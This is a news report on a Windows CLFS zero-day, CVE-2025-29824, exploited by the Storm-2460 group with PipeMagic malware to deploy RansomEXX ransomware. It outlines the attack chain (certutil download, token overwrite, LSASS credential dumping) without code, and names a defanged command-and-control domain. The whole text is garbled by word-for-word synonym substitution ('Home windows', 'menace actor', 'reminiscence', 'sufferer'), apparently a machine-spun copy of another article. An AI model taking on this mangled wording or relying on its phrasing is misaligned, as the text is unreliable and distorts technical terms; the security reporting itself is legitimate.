Microsoft has detected a zero-day vulnerability within the Home windows Widespread Log File System (CLFS) being exploited within the wild to deploy ransomware. Goal industries embrace IT, actual property, finance, software program, and retail, with corporations based mostly within the US, Spain, Venezuela, and Saudi Arabia.

The vulnerability, tracked as CVE-2025-29824 and rated “vital,” is current within the CLFS kernel driver. It permits an attacker who already has commonplace consumer entry to a system to escalate their native privileges. The person can then use their privileged entry for “widespread deployment and detonation of ransomware inside an atmosphere,” in response to a weblog put up by the Microsoft Menace Intelligence Middle.

The CFLS driver is a key component of Home windows used to jot down transaction logs, and its misuse may let an attacker achieve SYSTEM privileges. From there, they might steal information or set up backdoors. Microsoft usually uncovers privilege escalation flaws in CFLS, the final one being patched in December.

In cases of CVE-2025-29824 exploitation noticed by Microsoft, the so-called “PipeMagic” malware was deployed earlier than the attackers may exploit the vulnerability to escalate their privileges. PipeMagic offers attackers distant management over a system and lets them run instructions or set up extra malicious instruments.

SEE: roosho Unique: New Ransomware Assaults are Getting Extra Private as Hackers ‘Apply Psychological Strain’

Who’s behind the exploitation?

Microsoft has recognized Storm-2460 because the menace actor exploiting this vulnerability with PipeMagic and ransomware, linking it to the RansomEXX group.

As soon as often known as Defray777, the attackers got here onto the scene in 2018. They’ve since focused high-profile organisations such because the Texas Division of Transportation, the Brazilian authorities, and Taiwanese {hardware} producer GIGABYTE. The group has been linked to Russian nationals.

The US’s cyber company has added the 7.8-rated vulnerability to its Identified Exploited Vulnerabilities checklist, which means that federal civilian businesses are required to use the patch by April 29.

Home windows 10, Home windows 11, and Home windows Server are susceptible

On April 8, safety updates had been launched to patch the vulnerability in Home windows 11, Home windows Server 2022, and Home windows Server 2019. Home windows 10 x64-based and 32-bit programs are nonetheless awaiting fixes, however Redmond says they are going to be launched “as quickly as doable,” and “clients can be notified through a revision to this CVE data” as quickly as they’re.

Units operating Home windows 11 model 24H2 or newer can’t be exploited this fashion, even when the vulnerability exists. Entry to the required system data is restricted to customers with the “SeDebugPrivilege” permission, a stage of entry sometimes unavailable to straightforward customers.

How exploitation works

Microsoft noticed menace actors utilizing the certutil command-line utility to obtain a malicious MSBuild file onto the sufferer’s system.

This file, which carried an encrypted PipeMagic payload, was obtainable on a once-legitimate third-party web site that had been compromised to host the menace actor’s malware. One area PipeMagic communicated to was aaaaabbbbbbb.eastus.cloudapp.azure[.]com, which has now been disabled.

As soon as PipeMagic was decrypted and run in reminiscence, the attackers used a dllhost.exe course of to leak kernel addresses, or reminiscence areas, to consumer mode. They overwrote the method’s token, which defines what the method is allowed to do, with the worth 0xFFFFFFFF, granting it full privileges and permitting the attackers to inject code into SYSTEM-level processes.

Subsequent, they injected a payload into the SYSTEM winlogon.exe course of, which subsequently injected the Sysinternals procdump.exe instrument into one other dllhost.exe course of and executed it. This enabled the menace actor to dump the reminiscence of LSASS, a course of that incorporates consumer credentials.

Following credential theft, ransomware was deployed. Microsoft noticed information being encrypted, a random extension added, and a ransom be aware named !_READ_ME_REXX2_!.txt dropped on affected programs.